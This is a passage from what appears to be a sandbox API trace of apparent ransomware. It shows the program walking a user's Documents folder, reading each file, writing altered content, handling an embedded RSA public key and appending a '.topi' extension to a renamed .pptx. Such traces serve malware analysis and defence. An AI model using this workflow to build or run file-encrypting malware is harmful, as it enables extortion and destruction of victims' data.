Flags=0x0, Size=0x64) returned 0x751ab8 [0095.148] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.148] GetCurrentThreadId () returned 0x8c4 [0095.148] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.148] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.148] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0095.148] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.148] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.148] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.148] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.148] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0095.148] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0095.148] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.148] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb510 [0095.148] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.148] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0095.148] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.148] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.148] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.148] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.149] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0095.149] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0095.149] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0095.149] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.149] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0095.149] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.149] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d93a8 [0095.149] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.149] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0095.149] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.149] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.149] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0095.149] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0095.149] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0095.149] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d93c0 [0095.149] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0095.149] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0095.149] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0095.149] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9390 [0095.149] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0095.149] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.149] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.150] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.150] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.150] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d93d8 [0095.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.150] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8e80 [0095.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.150] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0095.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.150] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0095.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.150] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0095.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d93a8 | out: hHeap=0x680000) returned 1 [0095.150] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d93a8 [0095.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.150] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0095.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.150] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0095.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.150] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0095.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0095.150] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0095.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.150] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0095.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d93a8 | out: hHeap=0x680000) returned 1 [0095.150] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0095.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0095.150] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0095.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0095.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0095.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0095.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0095.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0095.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d93d8 | out: hHeap=0x680000) returned 1 [0095.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d93c0 | out: hHeap=0x680000) returned 1 [0095.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9390 | out: hHeap=0x680000) returned 1 [0095.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0095.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0095.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0095.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9378 | out: hHeap=0x680000) returned 1 [0095.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f1920 | out: hHeap=0x680000) returned 1 [0095.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0095.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0095.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb510 | out: hHeap=0x680000) returned 1 [0095.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0095.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0095.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0095.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0095.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0095.151] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x17e3a, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x17e3a, lpOverlapped=0x0) returned 1 [0095.152] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0095.152] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x17e3f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.152] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0095.152] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0095.152] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0095.152] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0095.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0095.152] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0095.152] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.152] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0095.153] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0095.153] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0095.153] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0095.153] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0095.153] CloseHandle (hObject=0x6a8) returned 1 [0095.162] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b3ff8 [0095.162] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x890) returned 0x31cf750 [0095.162] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3ff8 | out: hHeap=0x680000) returned 1 [0095.162] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tdeX 3--r7K2XLPqxP4.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tdex 3--r7k2xlpqxp4.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tdeX 3--r7K2XLPqxP4.pptx.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tdex 3--r7k2xlpqxp4.pptx.topi")) returned 1 [0095.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.163] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3f60 | out: hHeap=0x680000) returned 1 [0095.164] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41e89860, ftCreationTime.dwHighDateTime=0x1d57973, ftLastAccessTime.dwLowDateTime=0x8dafb3e0, ftLastAccessTime.dwHighDateTime=0x1d53c20, ftLastWriteTime.dwLowDateTime=0x8dafb3e0, ftLastWriteTime.dwHighDateTime=0x1d53c20, nFileSizeHigh=0x0, nFileSizeLow=0x8849, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yMP4dzVGPCH01lD1.xlsx", cAlternateFileName="YMP4DZ~1.XLS")) returned 1 [0095.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0095.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8e) returned 0x31b3f60 [0095.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0095.164] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\yMP4dzVGPCH01lD1.xlsx") returned=".xlsx" [0095.164] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\yMP4dzVGPCH01lD1.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ymp4dzvgpch01ld1.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.164] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=34889) returned 1 [0095.164] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.167] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x8823, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.167] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.168] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.168] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x8849, lpOverlapped=0x0) returned 1 [0095.168] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0095.168] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.168] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.169] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0095.169] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0095.170] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.170] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.170] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0095.170] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.170] GetLastError () returned 0x0 [0095.170] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.170] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0095.170] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.170] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.170] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.170] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.170] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.170] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.170] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.170] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8850) returned 0x99f72d8 [0095.170] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.170] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.170] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.170] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.171] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.171] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0095.171] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1920 [0095.171] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9378 [0095.171] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1968 [0095.171] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9390 [0095.171] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d93c0 [0095.171] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.171] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d93d8 [0095.171] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.171] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.171] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0095.171] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0095.171] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d93c0 | out: hHeap=0x680000) returned 1 [0095.171] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d93d8 | out: hHeap=0x680000) returned 1 [0095.171] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.171] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.171] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.171] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.171] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0095.171] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d93d8 [0095.171] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0095.171] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d93c0 [0095.171] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0095.171] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.171] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.171] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.171] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.172] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.172] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0095.172] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.172] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.172] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d93d8 | out: hHeap=0x680000) returned 1 [0095.172] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.172] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d93c0 | out: hHeap=0x680000) returned 1 [0095.172] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.172] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.172] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.172] HeapFree (in: 